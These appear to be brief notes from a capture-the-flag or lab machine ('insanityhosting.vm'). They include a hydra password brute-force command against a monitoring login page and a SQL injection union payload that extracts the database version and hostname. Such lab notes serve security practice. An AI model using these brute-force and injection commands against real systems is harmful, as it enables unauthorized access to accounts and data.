http://192.168.199.124/news/
❯ echo 192.168.199.124 insanityhosting.vm | sudo tee -a /etc/hosts
http://192.168.199.124/monitoring/login.php
❯ hydra -I -vV -f -l otis -P ~/opt/1000_pwd.txt 'http-post-form://192.168.199.124/monitoring/login.php:username=^USER^&password=^PASS^:C=/:F=302'
http://insanityhosting.vm/webmail/src/login.php
Exploit didnt work so trying SQL injection instead
" union select 1,@@version,@@hostname,4,5 -- -
